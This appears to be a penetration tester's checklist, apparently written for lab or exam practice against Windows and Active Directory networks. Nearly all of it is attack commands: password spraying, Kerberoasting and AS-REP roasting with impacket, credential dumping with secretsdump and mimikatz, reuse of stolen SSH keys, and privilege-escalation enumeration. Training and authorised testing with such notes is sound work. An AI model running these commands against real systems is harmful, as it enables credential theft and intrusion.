Penetration Test Checklist
Unauthenticated Recon - Domain
Initial Compromise of Network
Windows Privilege Escalation
Harvested a New Credential
Make sure to test twice. Once for domain and once for "--local-auth" to test local user passwords.
Spray Passwords
$ hydra -l "yoshi" -p 'Mushroom!' -M ips.txt rdp
$ netexec smb ips.txt -u users.txt -p passwords.txt
$ netexec winrm ips.txt -u users.txt -p passwords.txt
$ netexec wmi ips.txt -u users.txt -p passwords.txt
$ netexec mssql ips.txt -u users.txt -p passwords.txt -local-auth
Manual Spray (if above didn't recover anything).
$ proxychains evil-winrm -i 10.10.93.154 -u Administrator -p "Passwords"
$ proxychains xfreerdp /v:10.10.93.154 /u:Administrator /p:password
Harvested Domain Credential
Kerbrute
$ proxychains kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1
Kerberoast
$ proxychains impacket-GetUserSPNs -request -dc-ip 10.10.113.146 corp.com/web_svc
ASREP Roast
$ proxychains impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete
Harvest new Hash
Harvested a new Private Key
Spray Intranet (.ssh)
If we have a shell on a box and notice a user has a private key in their home directory, we should test it against all computers with ssh open.
victim@host$ ssh -i id_rsa [email protected]
Popped a new Shell
Manual Enumeration
Domain Connected User
Check ACL's/ACE's
PWNED Shell?- Dump Secrets!
$ proxychains impacket-secretsdump -hashes ":e728ecbadfb02f51ce8eed753f3ff3fd" [email protected]
PS> .\mimikatz.exe
Privilege Escalation - Windows
Automated Enumeration
PS> .\winPEASx64.exe
PS> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
Manual Enumeration
systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Network Card(s)" /C:"Hotfix(s)"
whoami /priv
net user <user>
net localgroup administrators
cmd.exe /c dir /a C:\
ls "program files"
netstat -nao
.\SharpHound -c All --domain medtech.com --zipfilename MEDTECH.zip
Active Directory Lateral Movement
Crying for help?
Last updated